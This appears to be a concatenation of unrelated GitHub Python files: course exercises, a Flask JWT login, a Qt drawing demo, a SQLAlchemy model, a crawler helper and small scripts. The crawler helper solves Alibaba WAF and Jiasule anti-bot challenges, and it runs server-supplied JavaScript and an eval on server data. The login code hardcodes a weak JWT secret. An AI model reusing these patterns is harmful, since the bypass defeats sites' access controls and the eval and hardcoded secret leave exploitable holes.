if line.startswith('X-DSPAM-Confidence:'):
count += 1
words = line.split()
confidence = float(words[1])
confidencesum += confidence
try:
average = confidencesum / count
print('The average confidence value is', average)
except ZeroDivisionError:
print('0 lines exist in the form requested')
#confidence_value()
def a_message_from():
'''find who sent the email'''
count = 0
fname = input('Enter file name: ')
try:
fhand = open(fname)
except FileNotFoundError:
print(fname, 'does not exist')
exit()
for line in fhand:
line = line.rstrip()
words = line.split()
if len(words) == 0:
continue
if words[0] == 'From':
count += 1
print(words[1])
print('There were', count, 'lines in the file '
'with From as the first word')
#a_message_from()
def my_romeo():
'''parsing romeo.txt file'''
words = []
myset = set()
with open('romeo.txt') as fhand:
for line in fhand:
line = line.rstrip()
for word in line.split():
#print(word)
if word not in words:
words.append(word)
myset.add(word)
words.sort()
print(words)
#print(myset)
#my_romeo()
| tomisile/PythonDemos | py4e Course/py4e_list_exercises.py | py4e_list_exercises.py | py | 2,570 | python | en | code | 0 | github-code | 36 |
12336375941 | #!/usr/bin/python3
"""
Defines requests for the drivers route
"""
from api.v1.views import app_views
from flask import jsonify, request, make_response
from functools import wraps
from hashlib import md5
from models import storage
from models.users import User
import datetime
import jwt
SECRET_KEY = 'thisissecret'
def token_required(f):
"""
checks given token if valid to access route
"""
@wraps(f)
def decorated(*args, **kwargs):
token = None
if 'x-access-token' in request.headers:
token = request.headers['x-access-token']
if not token:
return jsonify({'message' : 'Token is missing!'}), 401
try:
data = jwt.decode(token, SECRET_KEY, algorithms=['HS256'])
except Exception:
return jsonify({'message' : 'Token Expired, Please Log In Again!'}), 401
users = storage.all(User).values()
current_user = None
for user in users:
if user.id == data['id']:
current_user = user
if not current_user:
return jsonify({'message' : 'Token is invalid!'}), 401
return f(current_user, *args, **kwargs)
return decorated
@app_views.route('/login', strict_slashes=False, methods=['POST'])
def login():
"""
validates user login before assigning a json web token
"""
body = request.get_json()
all_users = storage.all(User).values()
user = None
for item in all_users:
if item.email == body.get("email"):
user = item
break
if not user:
return (make_response(jsonify({"error": "Invalid Username"}), 401,
{'WWW-Authenticate' : 'Basic realm="Login required!"'}))
if user.check_password(body.get("password")):
token = jwt.encode(
{'id' : user.id,
'exp' : datetime.datetime.utcnow() + datetime.timedelta(hours=24)
}, SECRET_KEY, algorithm='HS256')
response = jsonify({'token' : token,
"user": {
"id": user.id,
"first_name": user.first_name,
"last_name": user.last_name,
"phonenumber": user.phonenumber,
"email": user.email
}})
return response, 200
return (make_response(
'Invalid Password', 401,
{'WWW-Authenticate' : 'Basic realm="Login required!"'}))
| NamasakaLennox/Msimu | backend/api/v1/auth.py | auth.py | py | 2,555 | python | en | code | 0 | github-code | 36 |
28613251046 | from math import cos, pi, sin
from PySide import QtCore, QtGui
class RenderArea(QtGui.QWidget):
def __init__(self, path, parent=None):
super(RenderArea, self).__init__(parent)
self.path = path
self.penWidth = 1
self.rotationAngle = 0
self.setBackgroundRole(QtGui.QPalette.Base)
def minimumSizeHint(self):
return QtCore.QSize(50, 50)
def sizeHint(self):
return QtCore.QSize(100, 100)
def setFillRule(self, rule):
self.path.setFillRule(rule)
self.update()
def setFillGradient(self, color1, color2):
self.fillColor1 = color1
self.fillColor2 = color2
self.update()
def setPenWidth(self, width):
self.penWidth = width
self.update()
def setPenColor(self, color):
self.penColor = color
self.update()
def setRotationAngle(self, degrees):
self.rotationAngle = degrees
self.update()
def paintEvent(self, event):
painter = QtGui.QPainter(self)
painter.setRenderHint(QtGui.QPainter.Antialiasing)
painter.scale(self.width() / 100.0, self.height() / 100.0)
painter.translate(50.0, 50.0)
painter.rotate(-self.rotationAngle)
painter.translate(-50.0, -50.0)
painter.setPen(QtGui.QPen(self.penColor, self.penWidth,
QtCore.Qt.SolidLine, QtCore.Qt.RoundCap, QtCore.Qt.RoundJoin))
gradient = QtGui.QLinearGradient(0, 0, 0, 100)
gradient.setColorAt(0.0, self.fillColor1)
gradient.setColorAt(1.0, self.fillColor2)
painter.setBrush(QtGui.QBrush(gradient))
painter.drawPath(self.path)
class Window(QtGui.QWidget):
NumRenderAreas = 9
def __init__(self):
super(Window, self).__init__()
rectPath = QtGui.QPainterPath()
rectPath.moveTo(20.0, 30.0)
rectPath.lineTo(80.0, 30.0)
rectPath.lineTo(80.0, 70.0)
rectPath.lineTo(20.0, 70.0)
rectPath.closeSubpath()
roundRectPath = QtGui.QPainterPath()
roundRectPath.moveTo(80.0, 35.0)
roundRectPath.arcTo(70.0, 30.0, 10.0, 10.0, 0.0, 90.0)
roundRectPath.lineTo(25.0, 30.0)
roundRectPath.arcTo(20.0, 30.0, 10.0, 10.0, 90.0, 90.0)
roundRectPath.lineTo(20.0, 65.0)
roundRectPath.arcTo(20.0, 60.0, 10.0, 10.0, 180.0, 90.0)
roundRectPath.lineTo(75.0, 70.0)
roundRectPath.arcTo(70.0, 60.0, 10.0, 10.0, 270.0, 90.0)
roundRectPath.closeSubpath()
ellipsePath = QtGui.QPainterPath()
ellipsePath.moveTo(80.0, 50.0)
ellipsePath.arcTo(20.0, 30.0, 60.0, 40.0, 0.0, 360.0)
piePath = QtGui.QPainterPath()
piePath.moveTo(50.0, 50.0)
piePath.lineTo(65.0, 32.6795)
piePath.arcTo(20.0, 30.0, 60.0, 40.0, 60.0, 240.0)
piePath.closeSubpath()
polygonPath = QtGui.QPainterPath()
polygonPath.moveTo(10.0, 80.0)
polygonPath.lineTo(20.0, 10.0)
polygonPath.lineTo(80.0, 30.0)
polygonPath.lineTo(90.0, 70.0)
polygonPath.closeSubpath()
groupPath = QtGui.QPainterPath()
groupPath.moveTo(60.0, 40.0)
groupPath.arcTo(20.0, 20.0, 40.0, 40.0, 0.0, 360.0)
groupPath.moveTo(40.0, 40.0)
groupPath.lineTo(40.0, 80.0)
groupPath.lineTo(80.0, 80.0)
groupPath.lineTo(80.0, 40.0)
groupPath.closeSubpath()
textPath = QtGui.QPainterPath()
timesFont = QtGui.QFont("Times", 50)
timesFont.setStyleStrategy(QtGui.QFont.ForceOutline)
textPath.addText(10, 70, timesFont, "Qt")
bezierPath = QtGui.QPainterPath()
bezierPath.moveTo(20, 30)
bezierPath.cubicTo(80, 0, 50, 50, 80, 80)
starPath = QtGui.QPainterPath()
starPath.moveTo(90, 50)
for i in range(1, 5):
starPath.lineTo(50 + 40 * cos(0.8 * i * pi),
50 + 40 * sin(0.8 * i * pi))
starPath.closeSubpath()
self.renderAreas = [RenderArea(rectPath), RenderArea(roundRectPath),
RenderArea(ellipsePath), RenderArea(piePath),
RenderArea(polygonPath), RenderArea(groupPath),
RenderArea(textPath), RenderArea(bezierPath),
RenderArea(starPath)]
assert len(self.renderAreas) == 9
self.fillRuleComboBox = QtGui.QComboBox()
self.fillRuleComboBox.addItem("Odd Even", QtCore.Qt.OddEvenFill)
self.fillRuleComboBox.addItem("Winding", QtCore.Qt.WindingFill)
fillRuleLabel = QtGui.QLabel("Fill &Rule:")
fillRuleLabel.setBuddy(self.fillRuleComboBox)
self.fillColor1ComboBox = QtGui.QComboBox()
self.populateWithColors(self.fillColor1ComboBox)
self.fillColor1ComboBox.setCurrentIndex(
self.fillColor1ComboBox.findText("mediumslateblue"))
self.fillColor2ComboBox = QtGui.QComboBox()
self.populateWithColors(self.fillColor2ComboBox)
self.fillColor2ComboBox.setCurrentIndex(
self.fillColor2ComboBox.findText("cornsilk"))
fillGradientLabel = QtGui.QLabel("&Fill Gradient:")
fillGradientLabel.setBuddy(self.fillColor1ComboBox)
fillToLabel = QtGui.QLabel("to")
fillToLabel.setSizePolicy(QtGui.QSizePolicy.Fixed,
QtGui.QSizePolicy.Fixed)
self.penWidthSpinBox = QtGui.QSpinBox()
self.penWidthSpinBox.setRange(0, 20)
penWidthLabel = QtGui.QLabel("&Pen Width:")
penWidthLabel.setBuddy(self.penWidthSpinBox)
self.penColorComboBox = QtGui.QComboBox()
self.populateWithColors(self.penColorComboBox)
self.penColorComboBox.setCurrentIndex(
self.penColorComboBox.findText('darkslateblue'))
penColorLabel = QtGui.QLabel("Pen &Color:")
penColorLabel.setBuddy(self.penColorComboBox)
self.rotationAngleSpinBox = QtGui.QSpinBox()
self.rotationAngleSpinBox.setRange(0, 359)
self.rotationAngleSpinBox.setWrapping(True)
self.rotationAngleSpinBox.setSuffix('\xB0')
rotationAngleLabel = QtGui.QLabel("&Rotation Angle:")
rotationAngleLabel.setBuddy(self.rotationAngleSpinBox)
self.fillRuleComboBox.activated.connect(self.fillRuleChanged)
self.fillColor1ComboBox.activated.connect(self.fillGradientChanged)
self.fillColor2ComboBox.activated.connect(self.fillGradientChanged)
self.penColorComboBox.activated.connect(self.penColorChanged)
for i in range(Window.NumRenderAreas):
self.penWidthSpinBox.valueChanged[int].connect(self.renderAreas[i].setPenWidth)
self.rotationAngleSpinBox.valueChanged[int].connect(self.renderAreas[i].setRotationAngle)
topLayout = QtGui.QGridLayout()
for i in range(Window.NumRenderAreas):
topLayout.addWidget(self.renderAreas[i], i / 3, i % 3)
mainLayout = QtGui.QGridLayout()
mainLayout.addLayout(topLayout, 0, 0, 1, 4)
mainLayout.addWidget(fillRuleLabel, 1, 0)
mainLayout.addWidget(self.fillRuleComboBox, 1, 1, 1, 3)
mainLayout.addWidget(fillGradientLabel, 2, 0)
mainLayout.addWidget(self.fillColor1ComboBox, 2, 1)
mainLayout.addWidget(fillToLabel, 2, 2)
mainLayout.addWidget(self.fillColor2ComboBox, 2, 3)
mainLayout.addWidget(penWidthLabel, 3, 0)
mainLayout.addWidget(self.penWidthSpinBox, 3, 1, 1, 3)
mainLayout.addWidget(penColorLabel, 4, 0)
mainLayout.addWidget(self.penColorComboBox, 4, 1, 1, 3)
mainLayout.addWidget(rotationAngleLabel, 5, 0)
mainLayout.addWidget(self.rotationAngleSpinBox, 5, 1, 1, 3)
self.setLayout(mainLayout)
"""
for i in range(Window.NumRenderAreas):
topLayout.addWidget(self.renderAreas[i], i / 3, i % 3)
"""
self.fillRuleChanged()
self.fillGradientChanged()
self.penColorChanged()
self.penWidthSpinBox.setValue(2)
self.setWindowTitle("Painter Paths")
def fillRuleChanged(self):
rule = QtCore.Qt.FillRule(self.currentItemData(self.fillRuleComboBox))
for i in range(Window.NumRenderAreas):
self.renderAreas[i].setFillRule(rule)
def fillGradientChanged(self):
color1 = QtGui.QColor(self.currentItemData(self.fillColor1ComboBox))
color2 = QtGui.QColor(self.currentItemData(self.fillColor2ComboBox))
for i in range(Window.NumRenderAreas):
self.renderAreas[i].setFillGradient(color1, color2)
def penColorChanged(self):
color = QtGui.QColor(self.currentItemData(self.penColorComboBox))
for i in range(Window.NumRenderAreas):
self.renderAreas[i].setPenColor(color)
def populateWithColors(self, comboBox):
colorNames = QtGui.QColor.colorNames()
for name in colorNames:
comboBox.addItem(name, name)
def currentItemData(self, comboBox):
return comboBox.itemData(comboBox.currentIndex())
def __del__(self):
self.renderAreas = None
if __name__ == '__main__':
import sys
app = QtGui.QApplication(sys.argv)
window = Window()
window.show()
sys.exit(app.exec_())
| pyside/Examples | examples/painting/painterpaths.py | painterpaths.py | py | 9,211 | python | en | code | 357 | github-code | 36 |
24201086153 | # 백준 - 유기농 배추
import sys, collections
T = int(sys.stdin.readline())
tc = 0
def bfs(start, M, N):
global visited
dirs = ((-1,0), (1,0), (0,-1), (0,1)) # 상, 하, 좌, 우
queue = collections.deque()
queue.append(start)
while queue:
i, j = queue.popleft()
if visited[i][j]:
continue
visited[i][j] = True
for dir in dirs:
n_i, n_j = i+dir[0], j+dir[1]
if 0<= n_i < M and 0<=n_j <N:
if arr[n_i][n_j] and not visited[n_i][n_j]:
queue.append([n_i, n_j])
while tc < T:
M, N, K = map(int ,sys.stdin.readline().split(" "))
arr = [[False for _ in range(N)] for _ in range(M)]
visited = [[False for _ in range(N)] for _ in range(M)]
answer = 0
for _ in range(K):
i, j = map(int ,sys.stdin.readline().split(" "))
arr[i][j] = True
for i in range(M):
for j in range(N):
if arr[i][j] and not visited[i][j]:
answer += 1
bfs([i,j], M, N)
print(answer)
tc += 1 | superyodi/burning-algorithm | bfs/boj_1012.py | boj_1012.py | py | 1,095 | python | en | code | 1 | github-code | 36 |
20678800215 | from __future__ import annotations
from typing import List, Optional
from sqlalchemy import BigInteger, Column, Integer, String
from pie.database import database, session
class Seeking(database.base):
__tablename__ = "fun_seeking_seeking"
idx = Column(Integer, primary_key=True, autoincrement=True)
guild_id = Column(BigInteger)
channel_id = Column(BigInteger, default=None)
message_id = Column(BigInteger, unique=True)
user_id = Column(BigInteger)
text = Column(String)
@staticmethod
def add(
guild_id: int, channel_id: int, message_id: int, user_id: int, text: str
) -> Seeking:
query = Seeking(
guild_id=guild_id,
channel_id=channel_id,
message_id=message_id,
user_id=user_id,
text=text,
)
session.add(query)
session.commit()
return query
@staticmethod
def get(guild_id: int, channel_id: int, item_id: int) -> Optional[Seeking]:
return (
session.query(Seeking)
.filter_by(guild_id=guild_id, channel_id=channel_id, idx=item_id)
.one_or_none()
)
@staticmethod
def remove(guild_id: int, channel_id: int, item_id: int) -> int:
query = (
session.query(Seeking)
.filter_by(guild_id=guild_id, channel_id=channel_id, idx=item_id)
.delete()
)
session.commit()
return query
@staticmethod
def get_all(guild_id: int, channel_id: int = None) -> List[Seeking]:
if not channel_id:
return session.query(Seeking).filter_by(guild_id=guild_id).all()
return (
session.query(Seeking)
.filter_by(guild_id=guild_id, channel_id=channel_id)
.all()
)
def __repr__(self) -> str:
return (
f"<Seeking idx='{self.idx}' guild_id='{self.guild_id}' "
f"channel_id='{self.channel_id}' message_id='{self.message_id}' "
f"user_id='{self.user_id}' text='{self.text}'>"
)
def dump(self) -> dict:
return {
"guild_id": self.guild_id,
"channel_id": self.channel_id,
"message_id": self.message_id,
"user_id": self.user_id,
"text": self.text,
}
| pumpkin-py/pumpkin-fun | seeking/database.py | database.py | py | 2,317 | python | en | code | 0 | github-code | 36 |
20465270702 | # -*- coding: utf-8 -*-
# @Project : CrawlersTools
# @Time : 2022/6/21 17:08
# @Author : MuggleK
# @File : base_requests.py
import json
import random
import re
import time
from chardet import detect
from httpx import Client, Response
from loguru import logger
from CrawlersTools.requests.proxy import get_proxies
from CrawlersTools.requests.random_ua import UserAgent
class BaseRequests(object):
"""
A Rquests Class base on httpx
Usage:
```python
>>> base_requests = BaseRequests().base_requests
>>> response = base_requests('https://example.org')
```
"""
def base_requests(
self,
url: str,
session: object = None,
headers=UserAgent(),
method: str = "get",
proxies: dict = None,
proxy_url: str = None,
http2: bool = False,
encoding: str = None,
retry: int = 3,
**kwargs
) -> Response:
"""
内置ali_waf & 加速乐解密
:param url: 请求链接
:param session: 维持session可从外部传入
:param headers: 请求头
:param method: 具体请求方式
:param proxies: ip代理,配合proxy_url可失效自动切换
:param proxy_url: 获取代理链接
:param http2: 是否使用http2.0协议
:param retry: 请求重试次数,默认3次
:param encoding: 指定编码,默认detect解析,效果同requests的apparent_encoding
:param kwargs: 请求时需携带的其他参数
:return: Response
:exception: 1.代理失效&超过重试次数返回None 2.waf或加速乐解密失败返回None
"""
for _ in range(retry):
try:
proxies = proxies if proxies else get_proxies(proxy_url, http2=True)
session = session or Client(
http2=http2,
headers=headers,
proxies=proxies,
timeout=kwargs.get("timeout", 20),
verify=kwargs.get("verify", True),
follow_redirects=kwargs.get("allow_redirects", False)
)
response = session.request(
method=method.lower(),
url=url,
headers=headers,
content=kwargs.get("content"),
data=kwargs.get("data"),
files=kwargs.get("files"),
json=kwargs.get("json"),
params=kwargs.get("params"),
timeout=kwargs.get("timeout", 20),
follow_redirects=kwargs.get("allow_redirects", False)
)
response.encoding = encoding if encoding else detect(response.content)['encoding'] # chardet 更准确
if 200 <= response.status_code < 300 or response.status_code == 412:
if 'arg1=' in response.text:
acw_tc_cookie = f'acw_tc={session.cookies.get("acw_tc")};'
headers["Cookie"] = headers["Cookie"] + acw_tc_cookie if headers.get("Cookie") else acw_tc_cookie
reg_arg1 = re.findall("var arg1='(.*)';", response.text)[0]
arg2 = self.ali_waf(reg_arg1)
headers['cookie'] += f'acw_sc__v2={arg2}'
continue
return response
elif response.status_code == 521:
if 'document.cookie' in response.text:
cookie_key = [key for key in list(session.cookies.keys()) if key.startswith("__jsluid")][0]
headers["Cookie"] = headers["Cookie"] if headers.get("Cookie") else f'{cookie_key}={session.cookies.get(cookie_key)};'
headers["Cookie"] += f'{self.process_fuck_js(response.text)};'
continue
elif 'chars' in response.text:
__jsl_clearance_s = self.process_clearance(response.text)
headers["Cookie"] = '='.join(headers["Cookie"].split('=')[:-1]) + f'={__jsl_clearance_s};'
continue
else:
proxies = None
time.sleep(random.uniform(0, 1))
continue
except Exception as err:
logger.error(f'url:{url} error:{err} proxies:{proxies}')
proxies = None
time.sleep(random.uniform(0, 1))
continue
@staticmethod
def ali_waf(arg1):
"""
acw_sc__v2算法
:param arg1:
:return:
"""
list1 = [15, 35, 29, 24, 33, 16, 1, 38, 10, 9, 19, 31, 40, 27, 22, 23, 25, 13, 6, 11, 39, 18, 20, 8, 14, 21, 32,
26, 2, 30, 7, 4, 17, 5, 3, 28, 34, 37, 12, 36]
dict1 = {}
for i in range(len(arg1)):
string = arg1[i]
for j in range(len(list1)):
if list1[j] == i + 1:
dict1[j] = string
str1 = ''.join([dict1.get(i) for i in range(40)])
str1_list = list(str1)
str2 = "3000176000856006061501533003690027800375"
str2_list = list(str2)
str4 = ''
for m in range(0, len(str1_list), 2):
int1 = int(''.join(str1_list[m:m + 2]), 16)
int2 = int(''.join(str2_list[m:m + 2]), 16)
str3 = str(hex(int1 ^ int2))[2:]
if len(str3) == 1:
str3 = '0' + str3
str4 += str3
return str4
@staticmethod
def process_fuck_js(js_text):
import execjs
js_text = js_text.split(';location.href=loc')[0].split('document.cookie=')[-1]
r = execjs.eval(js_text).split(';')[0]
return r
@staticmethod
def process_clearance(html):
import hashlib
data = json.loads(re.findall(r'go\((.*?)\)', html)[1])
chars_length = len(data.get('chars'))
for i in range(chars_length):
for j in range(chars_length):
result = data.get('bts')[0] + data.get('chars')[i] + data.get('chars')[j] + data.get('bts')[1]
b = eval('hashlib.{}()'.format(data.get('ha')))
b.update(result.encode(encoding='utf-8'))
res = b.hexdigest()
if res == data.get('ct'):
return result
| MuggleK/CrawlersTools | CrawlersTools/requests/base_requests.py | base_requests.py | py | 6,417 | python | en | code | 16 | github-code | 36 |
16275076473 | import json
import sys
import argparse
import os
APPROX = 0.1
def isNumber(num):
isNum = False
try:
float(num)
isNum = True
except Exception as e:
isNum = False
return isNum
nameList = list()
def compareAny(self, other):
diff = list()
for att in self.attScalarList:
selfAtt = getattr(self, att)
otherAtt = getattr(other, att)
if 'compare' in dir(selfAtt) and 'compare' in dir(otherAtt):
nameList.append(self.name)
nameList.append(att)
retDiff = selfAtt.compare(otherAtt)
if len(retDiff):
diff += retDiff
nameList.pop()
nameList.pop()
continue
exact = True
if isNumber(selfAtt) and isNumber(otherAtt):
exact = False
selfAtt = float(selfAtt)
otherAtt = float(otherAtt)
if (exact and selfAtt != otherAtt) or (not exact and abs(selfAtt-otherAtt)>abs(selfAtt)*APPROX):
# print((exact and selfAtt != otherAtt), (not exact and abs(selfAtt-otherAtt)>abs(selfAtt)*APPROX), selfAtt, otherAtt, '--'*10)
diff.append(['_'.join(nameList)+'_'+self.name+'_'+att, selfAtt, otherAtt])
for attdName in self.attDictList:
attDSelf = getattr(self, attdName)
attDOther = getattr(other, attdName)
attDSelfKeys = set(attDSelf.keys())
attDOtherKeys = set(attDOther.keys())
if len(attDSelfKeys.symmetric_difference(attDOtherKeys)):
diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_DifferentKeys' , list(attDSelf.keys()), list(attDOther.keys())])
attDAll = set()
[attDAll.add(x) for x in attDSelf]
[attDAll.add(x) for x in attDOther]
for attV in attDAll:
if attV in attDSelf and attV in attDOther:
if 'compare' in dir(attDSelf[attV]) and 'compare' in dir(attDOther[attV]):
nameList.append(self.name)
nameList.append(attdName)
retDiff = attDSelf[attV].compare(attDOther[attV])
if len(retDiff):
diff += retDiff
nameList.pop()
nameList.pop()
continue
elif isNumber(attDSelf[attV]) and isNumber(attDOther[attV]):
selfAtt = float(attDSelf[attV])
otherAtt = float(attDOther[attV])
if abs(selfAtt-otherAtt)>selfAtt*APPROX:
diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , attDSelf[attV], attDOther[attV]])
continue
else:
if attDSelf[attV] != attDOther[attV]:
diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , attDSelf[attV], attDOther[attV]])
for attdName in self.attListList:
selfO = getattr(self, attdName)
othrO = getattr(other, attdName)
selfLen = len(selfO)
otherLen = len(othrO)
if selfLen != otherLen:
diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_Length' , selfLen, otherLen])
continue
if selfO == othrO: continue
for ind in range(selfLen):
if 'compare' in dir(selfO[ind]) and 'compare' in dir(othrO[ind]):
nameList.append(self.name)
nameList.append(attdName)
retDiff = selfO[ind].compare(othrO[ind])
if len(retDiff):
diff += retDiff
nameList.pop()
nameList.pop()
continue
elif isNumber(selfO[ind]) and isNumber(othrO[ind]):
selfAtt = float(selfO[ind])
otherAtt = float(othrO[ind])
if abs(selfAtt-otherAtt)>selfAtt*APPROX:
diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , selfO[ind], othrO[ind]])
continue
else:
if selfO[ind] != othrO[ind]:
diff.append(['_'.join(nameList)+'_'+self.name+'_'+attdName+'_'+attV , selfO[ind], othrO[ind]])
return diff
class App:
class Access:
attScalarList = ['calls', 'amount', 'CacheLineNumber', 'CacheLineUtil', 'used', 'strideSumm', 'pattern', 'accessSize', 'intensity', 'execSize', 'isSlm', 'bti'] # TODO , 'CacheLineMax', 'CacheLineMin'
attDictList = ['stride'] # TODO
attListList = ['distribution', 'sends', 'sourceMap'] # TODO
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
for att in self.attDictList:
setattr(self, att, data[att])
for att in self.attListList:
setattr(self, att, data[att])
self.name = '0x0' if len(data['sends']) == 0 else str(data['sends'][0])
def compare(self, other):
return compareAny(self, other)
class SendData:
attScalarList = ['calls', 'amount', 'CacheLineNumber', 'CacheLineUtil', 'used', 'transferred', 'strideSumm', 'pattern'] # , 'CacheLineMax', 'CacheLineMin'
attDictList = ['stride']
attListList = ['distribution']
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
self.stride = data['stride']
self.distribution = data['distribution']
self.name = str(data['name'])
def compare(self, other):
return compareAny(self, other)
class AggrD:
mems = ['Local', 'Global']
rws = ['Read', 'Write']
tus = ['Used', 'Transferred', 'CacheLineNumber', 'Calls']
def getListAttributes(self):
ls = list()
for mem in App.AggrD.mems:
for rw in App.AggrD.rws:
for tu in App.AggrD.tus:
ls.append('ad{}{}{}'.format(mem, rw, tu))
return ls
def __init__(self, data):
self.attScalarList = self.getListAttributes()
self.attDictList = []
self.attListList = []
for att in self.attScalarList:
setattr(self, att, data[att])
self.name = 'name'
def compare(self, other):
return compareAny(self, other)
class Kernel:
class Enqueue:
attScalarList = ['id', 'totalThreadsExecuted', 'aggregatedDataTotal', 'aggregatedDataAvg']
attDictList = ['sendDataTotal']
# attDictList = []
attListList = ['accesses']
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
self.sendDataTotal = dict()
for ky in data['sendDataTotal']:
data['sendDataTotal'][ky]['name'] = str(ky)
self.sendDataTotal[ky] = App.SendData(data['sendDataTotal'][ky])
self.aggregatedDataTotal = App.AggrD(data['aggregatedDataTotal'])
self.aggregatedDataAvg = App.AggrD(data['aggregatedDataAvg'])
self.accesses = list()
for acc in data['accesses']:
self.accesses.append(App.Access(acc))
self.name = str(data['id'])
def compare(self, other):
return compareAny(self, other)
attScalarList = ['name', 'enqueueNum', 'accessNum']
attDictList = ['enqueues']
attListList = []
def __init__(self, data):
for att in self.attScalarList:
setattr(self, att, data[att])
self.enqueues = dict()
for enqueue in data['enqueues']:
self.enqueues[enqueue] = App.Kernel.Enqueue(data['enqueues'][enqueue])
self.name = str(data['name'])
def compare(self, other):
return compareAny(self, other)
attScalarList = ['name', 'collectPercentage', 'envVars', 'analysisVersion'] # 'sourceFiles', 'date', 'resultsDir', 'applicationBin', 'workDirectory',
attDictList = ['kernels']
attListList = ['parameters']
def __init__(self, data):
for att in App.attScalarList:
setattr(self, att, data[att])
self.kernels = dict()
for kernelName in data["kernels"]:
self.kernels[kernelName] = App.Kernel(data["kernels"][kernelName])
self.parameters = data['parameters']
self.name = str(data['name'])
def __str__(self):
string = ''
for att in App.attScalarList:
string += '{}:{}, '.format(att,getattr(self, att))
return string
def compare(self, other):
return compareAny(self, other)
def readResults(path):
with open(path) as f:
data = json.load(f)
return App(data)
def main(argv):
parser = argparse.ArgumentParser(description='GPU Memory Access Ananlysis')
parser.add_argument(
'-r1',
metavar='DIRECTORY',
default='',
dest='results1',
type=str,
help='first result')
parser.add_argument(
'-r2',
metavar='DIRECTORY',
default='',
dest='results2',
type=str,
help='second result')
parser.add_argument(
'-f',
metavar='DIRECTORY',
default='',
dest='folder',
type=str,
help='Report directory')
if argv == 'sys':
args = parser.parse_args()
elif isinstance(argv, list):
args = parser.parse_args(argv)
else:
print('Arguments not recognized')
return -1
results1 = readResults(args.results1)
# print(results1)
results2 = readResults(args.results2)
# print(results2)
# print('calc diff')
diff = results1.compare(results2)
# print txt
print('\n\n\nDIFFERENCE:')
print(diff.__str__().replace('[','\n['))
if os.path.isdir(args.folder):
# save diff to json
with open(os.path.join(args.folder, 'compare_report.json'), 'w') as f:
f.write(json.dumps(diff))
# save to txt
with open(os.path.join(args.folder, 'compare_report.txt'), 'w') as f:
f.write(diff.__str__().replace('[','\n['))
return len(diff)
if __name__ == '__main__':
sys.exit(main('sys'))
| Priyankajaiswalintel/gramine | latest/bin64/gma/MAAT/compare.py | compare.py | py | 10,364 | python | en | code | null | github-code | 36 |
9156690869 | import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
import numpy as np
import random
from matplotlib.animation import FuncAnimation
from mpl_toolkits.mplot3d.art3d import Poly3DCollection
def randomwalk3D(n, angle_degrees, escape_radius=100):
x, y, z = np.zeros(n), np.zeros(n), np.zeros(n)
angle_rad = np.radians(angle_degrees)
current_direction = np.array([1, 0, 0]) # Initial direction (e.g., to the right)
def density(x, y, z):
# Define a density function that varies with position
# You can modify this function to create your desired gradient
return 1.0 / (1.0 + np.sqrt(x**2 + y**2 + z**2))
for i in range(1, n):
# Calculate the distance from the origin (sun)
distance = np.sqrt(x[i - 1]**2 + y[i - 1]**2 + z[i - 1]**2)
if distance > escape_radius:
# If outside the escape radius, move straight in the current direction
x[i] = x[i - 1] + current_direction[0]
y[i] = y[i - 1] + current_direction[1]
z[i] = z[i - 1] + current_direction[2]
else:
# Generate a random reflection angle within the specified range
reflection_angle = np.random.uniform(-angle_rad, angle_rad)
# Generate a random axis of rotation (x, y, or z)
axis = random.choice([0, 1, 2])
# Create a 3D rotation matrix based on the chosen axis and angle
rotation_matrix = np.identity(3)
if axis == 0:
rotation_matrix = np.dot(np.array([[1, 0, 0],
[0, np.cos(reflection_angle), -np.sin(reflection_angle)],
[0, np.sin(reflection_angle), np.cos(reflection_angle)]]), rotation_matrix)
elif axis == 1:
rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), 0, np.sin(reflection_angle)],
[0, 1, 0],
[-np.sin(reflection_angle), 0, np.cos(reflection_angle)]]), rotation_matrix)
else:
rotation_matrix = np.dot(np.array([[np.cos(reflection_angle), -np.sin(reflection_angle), 0],
[np.sin(reflection_angle), np.cos(reflection_angle), 0],
[0, 0, 1]]), rotation_matrix)
# Apply the rotation to the current direction
current_direction = np.dot(rotation_matrix, current_direction)
# Adjust the probability of reflection based on density
reflection_prob = density(x[i - 1], y[i - 1], z[i - 1])
if np.random.rand() > reflection_prob:
current_direction = -current_direction # Reflect back
# Update the position
x[i] = x[i - 1] + current_direction[0]
y[i] = y[i - 1] + current_direction[1]
z[i] = z[i - 1] + current_direction[2]
return x, y, z
# Number of iterations
num_iterations = int(1e3)
# Lists to store escape times for each iteration
escape_times = []
iteration_numbers = []
num_escapes = 0
# Define the sun_radius
sun_radius = int(1e2)
# 3D figure and axis for the entire plot
fig = plt.figure(figsize=(6, 6))
ax = fig.add_subplot(111, projection='3d')
# List to store the line objects for each frame
all_lines = []
# Function to initialize the animation
def init():
for line in all_lines:
line.set_data([], [])
line.set_3d_properties([])
average_escape_text.set_text('')
escape_count_text.set_text('')
return all_lines + [average_escape_text, escape_count_text]
# Function to calculate and update the average escape time
def update_average_escape(iteration):
if len(escape_times) > 0:
average_escape = sum(escape_times) / len(escape_times)
average_escape_text.set_text(f'Average Counts to Escape: {average_escape:.2f}')
else:
average_escape_text.set_text('')
return average_escape_text,
# Function to animate frames and define escape parameters
def animate(iteration):
global num_escapes # Add this line to indicate num_escapes is a global variable
n_steps = int(5e4)
reflection_angle_degrees = random.uniform(0, 180)
x_data, y_data, z_data = randomwalk3D(n_steps, reflection_angle_degrees)
distances = np.sqrt(x_data**2 + y_data**2 + z_data**2)
escape_radius = int(1e2)
escape_time = np.argmax(distances > escape_radius)
if escape_radius < escape_time:
num_escapes += 1
escape_times.append(escape_time)
iteration_numbers.append(iteration + 2)
line, = ax.plot(x_data, y_data, z_data, '-', linewidth=0.5, alpha=0.5, color=np.random.rand(3,))
all_lines.append(line)
# Update the average escape text
average_escape_text.set_text(f'Mean escape counts: {np.mean(escape_times):.2f}')
# Update the escape count text
escape_count_text.set_text(f'Escapes: {num_escapes} / {n_steps}')
iteration_count_text.set_text(f'Iteration: {iteration}')
return all_lines + [average_escape_text, escape_count_text, iteration_count_text]
# Create a text annotation for displaying average escape time and counts
